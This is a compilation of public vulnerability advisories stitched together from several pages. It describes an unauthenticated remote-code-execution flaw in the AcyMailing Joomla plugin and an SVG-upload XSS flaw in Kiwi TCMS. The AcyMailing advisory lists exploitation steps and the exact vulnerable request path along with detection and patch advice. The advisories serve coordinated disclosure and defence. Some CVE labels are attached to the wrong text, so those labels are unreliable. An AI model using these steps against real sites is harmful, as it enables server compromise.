*   **AcyMailing 6 Alpha 3**
    
    October 2, 2018
    
*   **AcyMailing 6 Alpha 2**
    
    August 29, 2018
    
*   **AcyMailing 6 Alpha 1**
    
    August 22, 2018

CVE-2023-28733: Changelog - AcyMailing

AnyMailing Joomla Plugin is vulnerable to unauthenticated remote code execution, when being granted access to the campaign's creation on front-office due to unrestricted file upload allowing PHP code to be injected. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.

**Advisory CVE-2023-28731, Unauthenticated RCE affecting the AcyMailing plugin for Joomla**

**CVE ID**: CVE-2023-28731 

**Vendor**: AcyMailing 

**Product**: Newsletter Plugin for Joomla in the Enterprise version 

**Title**: Unauthenticated RCE affecting the AcyMailing plugin for Joomla 

**Vulnerable Versions**: < 8.3.0 

**Problem Type (CWE)**:  

*   CWE-20 Improper Input Validation 
*   CWE-434 Unrestricted Upload of File with Dangerous Type 

**Impacts (CAPEC)**: CAPEC-242 Code Injection 

**CVSS 3.1**:  

*   9.8 Critical 
*   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 

**References**:  

*   https://www.acymailing.com/change-log/  
*   https://www.bugbounty.ch/advisories/CVE-2023-28731  

**CVE Description:** 

Introduction: 

AcyMailing is a newsletter and email marketing plugin available for Joomla and WordPress. 

The vulnerability: 

Unrestricted upload of files allows PHP code to be injected, leading to unauthenticated remote code execution, when being granted access to the campaign’s creation on front-office. 

This issue affects AnyMailing Joomla Plugin in versions below 8.3.0. 

The steps to exploit the vulnerability: 

*   Campaign creation access needs to be enabled on the front-office, the following steps can then be done unauthenticated 
*   Editing an AcyMailing template and initiate sending a test email 
*   One of the resulting requests sent to the plugin sets a thumbnail, this request can be manipulated and accepts PHP code, which gets stored on the system 
*   The resulting PHP file is accessible and enables execution of the injected code 

How to check for exploitation: 

*   The thumbnails are stored in the following location: /media/com\_acym/images/thumbnails/ 
*   Signs of a successful exploitation would be the presence of PHP files in this directory 
*   Check for suspicious POST requests similar to “/index.php?option=com\_acym&tmpl=component&4f0877f7c82462a794cb5a042282dbf0=1&ctrl=frontmails&task=setNewThumbnail” 

**Solution**: 

*   update to a fixed version (>= 8.3.0) 

**Workaround**: 

*   Prevent the execution of PHP files in the thumbnail directory to prevent the injected code from being executed 

**Timeline**: 

*   2023-02-01: reported 
*   2023-03-09: initial vendor notification 
*   2023-03-10: initial vendor response 
*   2023-03-20: release of fixed version 
*   2023-03-30: coordinated public disclosure 

**Credits**: 

*   Reporter: Raphaël Arrouas (“Xel”), on a bug bounty program of Bug Bounty Switzerland 
*   Coordinator: Bug Bounty Switzerland 

Diese Website verwendet Cookies, um Ihr Nutzererlebnis zu verbessern. Wir gehen davon aus, dass Sie damit einverstanden sind. Wenn nicht können sie die Cookie Einstellungen anpassen.  

  
  
Akzeptieren

CVE-2023-28731: CVE-2023-28731 - Bug Bounty Switzerland

Kiwi TCMS is an open source test management system for both manual and automated testing. Kiwi TCMS accepts SVG files uploaded by users which could potentially contain JavaScript code. If SVG images are viewed directly, i.e. not rendered in an HTML page, this JavaScript code could execute. This vulnerability has been fixed by configuring Kiwi TCMS to serve with the Content-Security-Policy HTTP header which blocks inline JavaScript in all modern browsers. This configuration change is provided in version 12.1 and users are advised to upgrade. Users unable to upgrade may set their Content-Security-Policy HTTP header manually.

**Impact**

Kiwi TCMS accepts SVG files uploaded by users which could potentially contain JavaScript code. If SVG images are viewed directly, i.e. not rendered in an HTML page, this JavaScript code could execute.

**Patches**

This vulnerability has been fixed by configuring Kiwi TCMS to serve with the Content-Security-Policy HTTP header which blocks inline JavaScript in all modern browsers.

**Workarounds**

Configure Content-Security-Policy header, see commit 6617cee0.

**References**

You can visit https://digi.ninja/blog/svg\_xss.php for more technical details.

Independently disclosed by Antonio Spataro and @1d8.

Tag

#php